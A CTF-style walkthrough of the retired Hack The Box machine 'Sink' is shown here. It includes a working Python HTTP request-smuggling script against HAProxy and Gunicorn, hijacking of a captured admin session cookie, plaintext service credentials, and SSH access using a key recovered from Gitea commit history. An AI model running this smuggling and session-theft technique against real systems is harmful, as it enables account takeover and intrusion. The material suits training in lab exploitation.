Hack The Box - Sink Writeup

Antonette Caldwell • October 3, 2021

retired insane

Machine: Sink

This write-up was last updated December 22, 2021

Completed on October 02, 2021

Scan the machine

nmap -Pn -p- --min-rate=1000 -T5 10.10.10.225 -oA Sink
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-02 15:22 UTC
Nmap scan report for 10.10.10.225
Host is up (0.0067s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds

Check the services

nmap -Pn -sC -sV -p 22,3000,5000 10.10.10.225 -oA SinkServices
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-02 15:23 UTC
Nmap scan report for 10.10.10.225
Host is up (0.0037s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=b6cc6b915b42d8f3; Path=/; HttpOnly
|     Set-Cookie: _csrf=yWoheG7qRxRb_nV45avALUtbG2c6MTYzMzE4OTAzMzY4Mjg2NzQ2NQ; Path=/; Expires=Sun, 03 Oct 2021 15:37:13 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 02 Oct 2021 15:37:13 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=11cdfe1277e0a459; Path=/; HttpOnly
|     Set-Cookie: _csrf=xlukEraBNOPBLL1o7XsCQqgafuk6MTYzMzE4OTAzODcyNjI1MTg4NQ; Path=/; Expires=Sun, 03 Oct 2021 15:37:18 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 02 Oct 2021 15:37:18 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
5000/tcp open  http    Gunicorn 20.0.0
|_http-server-header: gunicorn/20.0.0
|_http-title: Sink Devops
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
--snippet--
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.90 seconds

I checked the nmap results and saw that there are 3 open ports: 22, 3000, and 5000. Port 3000 returns a Gitea site, and port 5000 returns a Gunicorn web server and also a login page.

POST / HTTP/1.1
Host: sink.htb:5000
Content-Length: 67
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sink.htb:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sink.htb:5000/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=pyrrhus&email=pyrrhus%40example.com&password=P%40ssw0rd%21

After signing up, I was redirected to the dashboard and automatically signed in.

GET /home HTTP/1.1
Host: sink.htb:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sink.htb:5000/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw
Connection: close

It looks like a blog about DevOps. There is an author, Administrator, with the email address [email protected]. I went ahead and enumerated this site to see if anything interesting showed up.

wfuzz -w /usr/share/dirb/wordlists/big.txt --hc 404 -u http://10.10.10.225:5000/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.225:5000/FUZZ
Total requests: 20469

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000002401:   400        4 L      10 W       95 Ch       "anv..ndare"
000004964:   405        4 L      23 W       178 Ch      "comment"                                                                                                                    

 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 7: Failed to connect to 10.10.10.225 port 5000: Connection refused
Total time: 34.59148
Processed Requests: 8116
Filtered Requests: 8114
Requests/sec.: 234.6242

There seems to be nothing on the blog. So let me check out the Gitea website.

GET / HTTP/1.1
Host: sink.htb:3000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw
Connection: close

Check out the login page.

GET /user/login?redirect_to= HTTP/1.1
Host: sink.htb:3000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw; lang=en-US; i_like_gitea=d27aded02e6bd797; _csrf=o7kA0Y5sOOwgsds2bVlTAK_sppU6MTYzMzE4OTc3MjM5OTIzMTM4Mg
Connection: close

I tried logging in with gitea:gitea just to make sure that the server wasn't set up with the default credentials.

POST /user/login HTTP/1.1
Host: sink.htb:3000
Content-Length: 91
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw; lang=en-US; i_like_gitea=d27aded02e6bd797; _csrf=o7kA0Y5sOOwgsds2bVlTAK_sppU6MTYzMzE4OTc3MjM5OTIzMTM4Mg
Connection: close

_csrf=o7kA0Y5sOOwgsds2bVlTAK_sppU6MTYzMzE4OTc3MjM5OTIzMTM4Mg&user_name=gitea&password=gitea

I went back to Gitea to check out the users. There are three: david, marcus, and root. I browsed through their repos to see if they had anything, but nothing was there. I'm keeping the users in mind for later.

Let's go back to the Sink DevOps page. As noted before, there is a Gunicorn server that is being used with HAProxy. It showed up in Burp Suite, but I also went ahead and used Wireshark to capture what happens.

HTTP/1.1 200 OK
Server: gunicorn/20.0.0
Date: Sat, 02 Oct 2021 18:21:06 GMT
Connection: close
Content-Type: image/jpeg
Content-Length: 254071
Via: haproxy
X-Served-By: 43cf1c3e4113

Create a python script

#!/usr/bin/env python3

import socket
import time

# host = "127.0.0.1"
# port = 8000

vuln_host = "10.10.10.225"
vuln_port = 5000

body = f"""0

POST /notes HTTP/1.1
Host: {vuln_host}:{vuln_port}
Content-Length: 300
Origin: http://{vuln_host}:{vuln_port}
Content-Type: text/plain
Referer: http://10.10.10.225:5000/notes
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw

note=""".replace('\n','\r\n')

header = f"""GET / HTTP/1.1
Host: {vuln_host}:{vuln_port}
Content-Length: {len(body)}
Transfer-Encoding: \x0bchunked

""".replace('\n','\r\n')

request = (header + body).encode()

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((vuln_host, vuln_port))
    s.send(request)
    time.sleep(5)

Test the code

nc -lnp 8000
GET / HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 685
Transfer-Encoding: 
                   chunked

0

POST /notes HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sink.htb:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.225:5000/notes
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ.YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw

I ran the script a couple of times, changing out portions of it to get it to work.

GET /notes/delete/1234 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YVh6nw.MJOfvnbxMWLYpIv0eMVG_gud_18
X-Forwarded-For: 127.0.0.1

I was able to decode the session as a JWT. It returns the JWT token of the aforementioned account, [email protected]. I bypassed the request in Burp Suite by removing my session and inputting the admin session token.
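What such a session cookie exposes to anyone who captures it, as an added example (not code from the original write-up): it decodes the cookie issued to the write-up's own test account earlier on this page and checks its age. It assumes the cookie follows the `payload.timestamp.signature` layout of Flask's default session serializer, which the write-up does not confirm; `inspect_session` and `is_stale` are hypothetical helper names.

```python
import base64
import json
import zlib
from datetime import datetime, timezone

# Session cookie issued to the write-up's own test account (copied from the
# requests earlier on this page). No secret key is needed to read it.
COOKIE = ("eyJlbWFpbCI6InB5cnJodXNAZXhhbXBsZS5jb20ifQ"
          ".YVh-UA.Ph1zLI7aN_Ub08Z3uxdEJq02-dw")


def b64url(text: str) -> bytes:
    """Decode unpadded URL-safe base64."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def inspect_session(cookie: str) -> dict:
    """Read a signed (not encrypted) session cookie without verifying it.

    Assumed layout: base64url(JSON) "." base64url(unix time) "." base64url(MAC),
    with a leading "." on the payload when it is zlib-compressed.
    """
    payload, stamp, signature = cookie.rsplit(".", 2)
    compressed = payload.startswith(".")
    raw = b64url(payload[1:] if compressed else payload)
    if compressed:
        raw = zlib.decompress(raw)
    issued = int.from_bytes(b64url(stamp), "big")
    return {
        "claims": json.loads(raw),
        "issued": datetime.fromtimestamp(issued, tz=timezone.utc),
        "signature_len": len(b64url(signature)),
    }


def is_stale(cookie: str, max_age_seconds: int, now: datetime) -> bool:
    """True if the cookie is older than the lifetime a server should enforce."""
    age = (now - inspect_session(cookie)["issued"]).total_seconds()
    return age > max_age_seconds


if __name__ == "__main__":
    info = inspect_session(COOKIE)
    print(info["claims"], info["issued"].isoformat(), info["signature_len"])
```

The signature only stops tampering: the identity in the payload is readable by anyone who sees the cookie, and the cookie works as a bearer credential until the server stops honouring it, so a short enforced lifetime limits how long a captured value stays useful.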

I noticed there were three notes.

Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz
Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3
Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

I tried to access each of these URLs, but they did not return a site. I saw that there is a credential for the Dev Node, and these credentials worked for the Gitea login.

While browsing through the three repositories that were available for me to see, I went ahead and looked at the main repositories for root, and found an archived repo called Key_Management.

The commit history showed that an SSH key had been removed. Copy the SSH key to a file, change its permissions to 400, and then connect to the server.

chmod 400 marcus_key 
$ssh -i marcus_key [email protected]
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 02 Oct 2021 07:15:32 PM UTC

  System load:                      0.16
  Usage of /:                       38.3% of 17.59GB
  Memory usage:                     58%
  Swap usage:                       0%
  Processes:                        302
  Users logged in:                  0
  IPv4 address for br-85739d6e29c0: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.225

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

197 updates can be installed immediately.
115 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Jan 27 12:14:16 2021 from 10.10.14.4
marcus@sink:~$ ls
user.txt
marcus@sink:~$ cat user.txt 
--snippet--

Now that we have user.txt, let's take a look at the server.

ps auxwww --forest
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
--snippet--
root           1  0.0  0.2 167936 11888 ?        Ss   15:27   0:03 /sbin/init maybe-ubiquity
root         582  0.0  0.9  84508 36800 ?        S<s  15:27   0:04 /lib/systemd/systemd-journald
root         610  0.0  0.1  21236  5212 ?        Ss   15:27   0:00 /lib/systemd/systemd-udevd
root         759  0.0  0.4 345804 18200 ?        SLsl 15:27   0:05 /sbin/multipathd -d -s
systemd+     797  0.0  0.3  24584 13528 ?        Ss   15:27   0:01 /lib/systemd/systemd-resolved
systemd+     798  0.0  0.1  90396  6376 ?        Ssl  15:27   0:00 /lib/systemd/systemd-timesyncd
root         809  0.0  0.2  47532 10428 ?        Ss   15:27   0:00 /usr/bin/VGAuthService
root         810  0.0  0.1 237104  7716 ?        Ssl  15:27   0:14 /usr/bin/vmtoolsd
root         943  0.0  0.1 235640  7520 ?        Ssl  15:27   0:00 /usr/lib/accountsservice/accounts-daemon
message+     946  0.0  0.1   7632  4608 ?        Ss   15:27   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         962  0.0  0.0  81952  3792 ?        Ssl  15:27   0:00 /usr/sbin/irqbalance --foreground
syslog       966  0.0  0.1 224332  5300 ?        Ssl  15:27   0:01 /usr/sbin/rsyslogd -n -iNONE
root         969  0.0  0.6 850276 27884 ?        Ssl  15:27   0:04 /usr/lib/snapd/snapd
root         971  0.0  0.1  16816  7916 ?        Ss   15:27   0:00 /lib/systemd/systemd-logind
root        1118  0.0  0.1 232708  6892 ?        Ssl  15:27   0:00 /usr/lib/policykit-1/polkitd --no-debug
git         1131  0.5  6.5 1658876 264108 ?      SLsl 15:27   1:26 /usr/local/bin/gitea web --config /etc/gitea/app.ini
root        1139  0.0  0.0   6812  2992 ?        Ss   15:27   0:00 /usr/sbin/cron -f
root        1148  0.1  1.3 1363432 52868 ?       Ssl  15:27   0:14 /usr/bin/containerd
root        2611  0.0  0.1 110108  6064 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/ec0b4822129edc8b2f15b1186e9201d4049e97ee437b6b0d15eaa591b7efbe73 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        2713  0.0  0.0   2232  1732 ?        Ss   15:27   0:00  |   \_ /bin/bash /usr/local/bin/docker-entrypoint.sh
root        3553  0.0  0.4  21848 19804 ?        S    15:27   0:05  |       \_ /usr/bin/python3.8 /usr/bin/supervisord -c /etc/supervisord.conf
root        3872  0.0  0.0   1160   700 ?        S    15:28   0:00  |       |   \_ make infra
root        3874  0.3  2.9 127628 119616 ?       Sl   15:28   0:47  |       |       \_ python bin/localstack start --host
root        5028  0.0  0.2 714668 10852 ?        Ssl  15:28   0:01  |       |           \_ /opt/code/localstack/localstack/infra/kms/local-kms.alpine.bin
root        3555  0.0  0.0   1568     4 ?        S    15:27   0:01  |       \_ tail -qF /tmp/localstack_infra.log /tmp/localstack_infra.err
root        2619  0.0  0.1 108700  6376 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/874e4a1392a2a0c4a645f064ebbbb8828ba669e0edb7417d8cc0b748ee8bfc28 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        2746  0.0  0.5  63508 20176 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3723  0.0  0.6 106312 26688 ?        S    15:28   0:01  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       3937  0.2  0.8 132144 33580 ?        S    15:28   0:32  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3724  0.0  0.1  27992  4284 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3725  0.2  0.5  63908 20848 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        5301  0.1  0.4 356196 16372 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2756  0.0  0.1 110108  5144 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/5e2c45dfa518c1786b0316a91f609c38bf74d9d6d0414a1e1ff004fbae79eac9 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        2869  0.0  0.5  63504 20236 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3952  0.0  0.6 106312 26652 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4173  0.2  0.8 132136 33600 ?        S    15:28   0:35  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3955  0.0  0.1  27992  4328 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3957  0.2  0.5  63908 20836 ?        S    15:28   0:32  |       \_ python3 /home/bot/bot.py
root        5578  0.1  0.4 356196 16460 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2776  0.0  0.1 110108  5924 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/aacae3cf513b6743b303136fbab509735c6c56656f121056772255da58a78ed4 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3071  0.0  0.5  63512 20352 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4008  0.0  0.6 106312 26800 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4254  0.2  0.8 132136 33364 ?        S    15:28   0:34  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4009  0.0  0.1  27992  4308 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4223  0.2  0.5  63908 20912 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        5083  0.1  0.4 356196 16348 ?        Sl   15:28   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2804  0.0  0.1 110108  5964 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/a3bb59be4ff6ce978153fb2a864a424406ed6ec8b5536d9b42699e6c5bd6eebc -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3060  0.0  0.5  63512 20236 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3928  0.0  0.6 106312 26828 ?        S    15:28   0:01  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4110  0.2  0.8 132140 33504 ?        S    15:28   0:34  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3929  0.0  0.1  27992  4324 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3930  0.2  0.5  63908 20832 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        5506  0.1  0.4 356196 16400 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2833  0.0  0.1 108700  5204 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/ff0c84e62bfa5ab4970744971e02b3f867e78b5721e82df1d34cfa41d55bc584 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3088  0.0  0.5  63508 20164 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3769  0.0  0.6 106312 26776 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4011  0.2  0.8 132136 33448 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3770  0.0  0.1  27992  4312 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4056  0.2  0.5  63908 20916 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5137  0.1  0.4 356196 16356 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2921  0.0  0.1 110108  6096 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/c8361846ea2c8bb7d7fae7378fe69451450c89cf8d3e46c8276e8b02faaff42e -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3013  0.0  0.5  63508 20256 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3803  0.0  0.6 106312 26648 ?        S    15:28   0:01  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       3991  0.2  0.8 132080 33584 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3804  0.0  0.1  27992  4324 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3805  0.2  0.5  63908 20960 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        5351  0.1  0.4 356196 16464 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        2963  0.0  0.1 108700  6372 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/43cf1c3e41138c03d689e69555f51f26fd4ad4e6424c2314f8e3a3e19f9b032a -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3188  0.0  0.5  63508 20328 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3924  0.0  0.6 106312 26864 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4206  0.2  0.8 134116 35248 ?        S    15:28   0:43  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3925  0.0  0.1  28264  4688 ?        S    15:28   0:07  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3926  0.2  0.5  63908 20876 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        4848  0.1  0.4 362800 17376 ?        Sl   15:28   0:27  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3011  0.0  0.1 108700  5136 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/a3308a3f1e594a4c065a37abcf430b5e0f94700d774a63e957a0a247a0f3ced8 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3156  0.0  0.5  63508 20160 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4013  0.0  0.6 106312 26788 ?        S    15:28   0:01  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4105  0.2  0.8 132140 33456 ?        S    15:28   0:34  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4017  0.0  0.1  27992  4220 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4018  0.2  0.5  63908 20872 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5190  0.1  0.4 356196 16408 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
